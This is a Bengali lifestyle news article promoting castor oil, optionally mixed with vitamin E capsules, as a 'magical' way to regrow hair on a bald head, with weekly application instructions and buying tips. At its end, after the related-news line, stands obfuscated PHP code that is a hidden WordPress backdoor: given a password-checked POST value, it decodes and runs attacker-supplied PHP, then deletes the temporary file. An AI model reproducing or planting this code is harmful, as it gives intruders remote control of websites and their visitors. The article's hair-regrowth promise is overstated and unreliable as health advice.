মঙ্গলবার, ১৮ই জুন, ২০২৪ খ্রিস্টাব্দ ৪ঠা আষাঢ়, ১৪৩১ বঙ্গাব্দ

টাক মাথায় চুল গজানোর যাদুকরী উপায়

 

লাইফস্টাইল ডেস্ক :সকালে ঘুম থেকে উঠে চুল আঁচড়াতে গিয়ে একরাশ চুলের জটলা। এ রকম অবস্থা দেখতে কার ভালো লাগে। তাই এ সমস্যা থেকে মুক্তি পেতে কতো রকমের চেষ্টাই না করেন ভুক্তভোগীরা। চুল পড়া রোধে হাজার হাজার টাকা খরচ করতে অনেকে কুণ্ঠাবোধ করেন না। এই সমস্যাটা এখন অনেক বেশি পরিলক্ষিত হয়। বিভিন্ন কারণে আপনার মাথা থেকে চুল পড়তে পারে। চুলপড়া রোধে সব রকম চেষ্টা করেও কোনো লাভ হচ্ছে না। তাদের জন্য সুখবর হলো, একটি সাধারণ তেল আপনার মাথায় চুল গজাতে সাহায্য করবে।

Why-are-bald-1024x683

 

নতুন চুল গজাতে সাহয্য করা এই তেলের নাম ক্যাস্টর অয়েল। অনেকে জানেন না যে নতুন চুল গজাতে এই তেল কতোটা উপকারী। ক্যাস্টর অয়েলে আছে রিসিনোলেইক এসিড যা নতুন চুল, ভ্রু, চোখের পাপড়ি গজাতে অত্যন্ত সহায়ক। এছাড়াও চুলের রুক্ষ্মতা দূর করে চুলকে মোলায়েম করে তুলতে সহায়তা করে এই তেল।

 

কীভাবে ব্যবহার করবেন :
ক্যাস্টর অয়েল একটানা ব্যবহার করলে হবে না, করতে হবে নিয়ম মেনে। সপ্তাহে একদিন করে টানা ৮ সপ্তাহ ব্যবহার করুন এই তেল। ক্যাস্টর অয়েল মধুর মতো ঘন, প্রথম প্রথম একটু অসুবিধা হতেই পারে।

 

ব্যবহার করার পদ্ধতি বেশ সোজা। ক্যাস্টর অয়েল নিন, এতে যোগ করতে পারেন একটি ভিটামিন’ই ক্যাপসুলের ভেতরকার তরল। চুল লম্বা হলে একাধিক ক্যাপসুল দিন। এরপর এই তেল রাতে ঘুমাবার আগে ভালো করে মাথায় মাখুন।

 

বিশেষ করে চুলের গোঁড়ার ত্বকে ম্যাসাজ করে লাগান। সারারাত এই তেল চুলে থাকতে দিন। সকালে শ্যাম্পু করে ফেলুন। কোনো বাড়তি কন্ডিশনার লাগবে না।

যেখানে পাবেন :
যে কোনো ফার্মেসীতে ও সুপারশপে ক্যাস্টর অয়েল পাবেন আপনি। দেশি-বিদেশি দুই রকমই পাওয়া যায়। দেশি তেলগুলো দামে বেশ সস্তা। মোটামুটি ১০০ টাকার কমে আপনি এক বোতল পাবেন যা ব্যবহার করতে পারবেন ১ মাস! বিদেশি গুলোর দাম একটু বেশি। মানও একটু ভালো।

 

তাহলে আর দেরি কেন, চুলের জন্য বাড়তি চর্চা শুরু করে দিন। পাতলা হয়ে যাওয়া চুলগুলো আবার হয়ে উঠুক ঘন।উল্লেখ্য, যাদের বংশগত কারণে বা কোনো অসুখের জন্য টাক পড়ছে, তাদের ক্ষেত্রে আসলে কোনো চিকিৎসাই কাজ দেবে না। প্রয়োজন আগে অসুখের চিকিৎসা। যাদের চুল পড়ছে স্ট্রেস, যত্নের অভাব, ভুল প্রসাধন ইত্যাদি কারণে; তাদের ক্ষেত্রে ক্যাস্টর অয়েল খুব ভালো কাজে দেবে।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}